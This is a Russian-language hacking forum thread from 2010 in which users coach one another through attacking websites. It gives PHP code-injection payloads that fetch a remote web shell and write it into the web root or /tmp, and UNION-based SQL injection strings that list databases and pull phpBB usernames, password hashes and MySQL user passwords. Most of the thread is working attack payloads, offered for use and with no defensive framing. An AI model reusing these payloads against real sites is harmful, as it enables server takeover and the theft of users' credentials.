08.06.2010, 01:34
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от a1ertso
При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?
id=include("http://yoursite.com/yourfile");
id=copy($_GET[file1],$_GET[file2]);&file1=http://yoursite.com/yourfile.txt&file2=/yourpath/to/webfolder/
например
file1=http://microsoft.com/shell.txt&file2=/var/www/html/shell.php
если не знаешь полный путь к сайту to копируй шелл в папку /tmp
потом делай локальный инклуд
include("/tmp/shell.php");
Последний раз редактировалось Konqi; 08.06.2010 в 01:39..
|
|
|
08.06.2010, 08:12
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Есть SQL inj.
Перебрал все таблицы и колонки, но не могу вывести информацию из этих таблиц.
5 ветка.
1,2,3,4,5,passwords,7+from+site_users--
Надо как бэ указать юзера БД, чтобы вывести информацию? Но как это сделать?
|
|
|
|
08.06.2010, 08:24
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--
|
|
|
|
08.06.2010, 08:40
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от LokbatanLi
1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--
ок, ну как вывести password указв при этом юзверя БД?
|
|
|
|
08.06.2010, 08:48
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от Redwood
select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129
|
|
|
|
08.06.2010, 08:51
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от SeNaP
т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129
А, сори не так понял, я думал тебе надо юзера, под которым работает БД )
Если нужно вывести пароль нужного пользователя из таблицы phpbb_users, то вот так
select+1,2,3,4,5,concat_ws(0x3a,username,user_pass word),7+from+phpbb_users+where+username='имя юзера'
и подставь свои значения колонок, по дефолту для phpbb, как мне помниться это username и user_password
Последний раз редактировалось Redwood; 08.06.2010 в 10:19..
|
|
|
|
08.06.2010, 08:59
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от Redwood
А, сори не так понял, я думал тебя надо юзера, под которым работает БД )
Для того, чтобы тебе вывести имя нужного пользователя из конкретной таблицы надо сделать запрос select+1,2,3,4,5,username,7+from+phpbb_users+where +username='имя юзера'
Первый раз ты правильно понял 
мне как раз вот это и нужно
под которым работает БД )
Просто помоги составить запрос с теми данными
|
|
|
|
08.06.2010, 08:47
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от SeNaP
ок, ну как вывести password указв при этом юзверя БД?
select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
|
|
|
|
08.06.2010, 10:08
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
pervoe posmotri u tebya kakie bd (schema_name)
select+1,2,3,4,5,schema_name,7+from+information_sc hema.schemata
a potom posmotri table_name=>phpBB_users v kakoy bd ? naprimer imya bd test..i zapros budet..
select+1,2,3,4,5,password,7+from+phpbb_users.test
|
|
|
|
08.06.2010, 13:15
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2 LokbatanLi,
Код:
+from+test.phpbb_users
, т.е. "имя БД .Таблица" |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
